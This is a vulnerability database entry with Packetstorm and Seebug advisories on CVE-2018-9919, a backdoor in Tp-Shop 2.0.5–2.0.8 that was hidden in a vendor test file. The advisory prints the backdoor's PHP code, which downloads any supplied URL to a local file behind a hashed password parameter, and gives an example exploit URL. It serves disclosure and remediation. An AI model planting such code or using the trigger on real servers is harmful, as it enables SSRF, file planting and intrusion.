Vulnerabilities > CVE-2018-9919 - Server-Side Request Forgery (SSRF) vulnerability in Tp-Shop 2.0.5/2.0.8
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
A web-accessible backdoor, with resultant SSRF, exists in Tp-shop 2.0.5 through 2.0.8, which allows remote attackers to obtain sensitive information, attack intranet hosts, or possibly trigger remote command execution, because /vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php writes data from the "down_url" URL into the "bddlj" local file if the attacker knows the backdoor "jmmy" parameter.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 2 |
Common Weakness Enumeration (CWE)
Packetstorm
data source | https://packetstormsecurity.com/files/download/147434/tpshop208-backdoor.txt |
id | PACKETSTORM:147434 |
last seen | 2018-05-07 |
published | 2018-05-02 |
reporter | Jiawang Zhang |
source | https://packetstormsecurity.com/files/147434/Tpshop-2.0.8-Arbitrary-File-Download-SSRF.html |
title | Tpshop 2.0.8 Arbitrary File Download / SSRF |
Seebug
bulletinFamily | exploit |
description | ## Backdoor in Tpshop <= 2.0.8 (CVE-2018-9919) The Tpshop open source mall system is a multi-merchant mode mall system developed by Shenzhen Leopard Network Co., Ltd.This system is based on the Thinkphp development framework. #### Product Download: http://www.tp-shop.cn/Index/Index/download.html #### Vulnerability Type:Web Backdoor #### Attack Type : Web Backdoor ### Vulnerability Description Tpshop has a backdoor code in the '/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php' that can be used to download files to the other server and can also initiate attacks through SSRF vulnerabilities. The vulnerability code: ``` /vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php(Line 486 to 499): $path = $_REQUEST['bddlj']; $fileUrl =$_REQUEST['down_url']; if(md5(md5($_REQUEST['jmmy'])) !== 'caae8ca617372b67363bd284e98430f2') return false; $path = strtolower($path); if(strstr($path,'php')) return false; $ch = curl_init($fileUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_BINARYTRANSFER,1); $file = curl_exec ($ch); curl_close ($ch); $fp = fopen($path,'w'); fwrite($fp, $file); fclose($fp); ``` ### Exploit The attacker can exploit this vulnerability to attack the server and increase its privileges,Example: download arbitrary files,scan network port,information detection,attack internal network vulnerable’s server. http://target//vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php?bddlj=save_filename&down_url=download_url&jmmy=decryptpass ### Versions Tpshop <= 2.0.8 ### Impact Web Backdoor in Tp-shop 2.0.5-2.0.8 version allow remote attackers to download arbitrary files,scan network port,information detection,attack internal network vulnerable’s server,may even cause a remote command execution via the url parameter。 ### Repairs Delete Web Backdoor code. (/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php(Line 486 to 499)) ### Credit This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC) |
id | SSV:97261 |
last seen | 2018-06-26 |
modified | 2018-05-02 |
published | 2018-05-02 |
reporter | My Seebug |
title | Backdoor in Tpshop <= 2.0.8 (CVE-2018-9919) |